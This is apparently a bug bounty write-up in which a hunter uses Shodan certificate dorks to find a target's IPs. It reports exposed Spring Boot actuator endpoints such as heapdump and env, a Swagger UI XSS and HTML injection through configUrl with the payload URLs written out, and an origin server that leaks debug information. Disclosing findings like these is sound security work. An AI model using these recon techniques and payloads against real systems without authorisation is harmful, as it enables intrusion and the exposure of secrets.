.png)
3 hours ago
7 BOOK THIS SPACE FOR AD
ARTICLE AD
Hey there fellow hunters! Happy to share with you how I got three valid bugs on VDP Program by shodan help!
The Bugs is :
Information disclosure marked as P1 (Critical)XSS && HTMLI On swagger UIInformation Exposure Through Debug InformationIn the last days of my bug bounty journey i decided to learn new techniques for my recon process, so here what i I never learned it before? , yeah that’s shodan , for my luck i have good friend Suggested to me a great video for learning shdoan by the master of recon Orwa Atyat , i will put the link at the end , so let’s continue
The Setup
In the first I prepared shodan for search on the target domain IPs so used that dork :
Ssl.cert.subject.CN:"target.com"And I got many and many numbers of Ips
Now to make it easier , i clicked The blue word ‘More’
and you must see that :
In country option change it to ‘http.title’ ==> that to see the http response above every IP ==> that make easy to detect important Ips :)
##The first Bug Information disclosure Via ‘springboot actuator path’:
When i search on the Ips with the title saw interesting title that is : ‘Whitelabel Error Page’ that error is strange to me so here i opened the link in the browser and see that page :)So here i tried to make some Fuzzing with The powerful tool ‘dirsearch’ and custom wordlist on that IP and got many paths like :
/actuator/ ->> The main path/actuator/heapdump
/actuator/beans
/actuator/caches
actuator/conditions
/actuator/configprops
/actuator/env
/actuator/threaddump
/actuator/mappings
/actuator/loggers
Now you ask me what that paths and what it contain?
here explain some of them
/actuator/heapdumpA heap dump is a snapshot of an application’s memory at a given time. It typically contains objects, variables, and references that were in use when the dump was generated. While intended for debugging, an exposed heap dump can pose security risks if it contains sensitive information. Potential Security Risks:
Exposure of Sensitive Data — Heap dumps may contain authentication tokens, API keys, session identifiers, or even user-related data that should not be publicly accessible.
Information Disclosure — Internal application logic, class structures, and function references can be extracted, aiding an attacker in understanding backend mechanisms. Compliance & Privacy Risks — If user data is present, this could lead to compliance concerns related to data protection regulations (e.g., GDPR, CCPA).
Since this file is publicly accessible, an attacker could analyze its contents to gain unintended insights into the application’s internals, increasing the attack surface. I recommend restricting access to heap dumps and ensuring they are not exposed in production environments.
/actuator/beansThe /actuator/beans endpoint provides a full list of all Spring Beans in the application context. This can be dangerous because:
Application Structure Disclosure — Attackers can map out service names, component dependencies, and internal classes, helping in targeted attacks.
Sensitive Functionality Exposure — If certain beans are related to authentication, database connections, or API interactions, an attacker may leverage this knowledge to craft more precise attacks.
That some of paths , then i reported it and guess what ? yea its marked as P1 (Critical)
##The second Bug XSS && HTMLI On swagger UI :
Also when searching in the Ips with the title saw tittle with ‘Swagger UI’I opened it quickly because i had with it a bug I spoke already about it in that writeup :https://medium.com/@hamdiyasin135/the-power-of-swagger-ui-docs-broken-access-control-a3b57fb035bd
so here i checked the version of the swagger and noticed that it have old version and it maybe vulnerable to XSS and HTML i so i searched for exploit to it and discover that it’s vulnerable in the parameter /?configUrl
that parameter used to load external config to the swagger so used that payload to make the XSS attack https://target.com/?configUrl=https://xss.smarpo.com/test.json
And for HTMLi used that Payload /?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json
And at the end the bug has beed triaged :
##The Third Bug Is Information Exposure Through Debug Information
while i testing on subdomains i got strange one that when i open it i got that errorthe error tell me the debug mode is not enabled on that subdomain so i got great idea that :what if i searched for the origin ip for that subdomain ?maybe the debug mode is enabled on it ? i don’t know
so searched for the origin ip for that subdomain on shodan and at the end i got it , and guess what?! , the debug mode is enabled on it!!!!
and I observed that it exposed :
Multiple internal pathsDetailed traceback errorsServer configuration detailsBackend framework informationAnd the bug has beed triaged also :)
![OoHow to get a Job in the Cybersecurity field [With my experience]](https://miro.medium.com/v2/resize:fill:88:88/1*uney5OKbxxfykdlwmeosyg.jpeg)
Bengali (Bangladesh) · 
English (United States) ·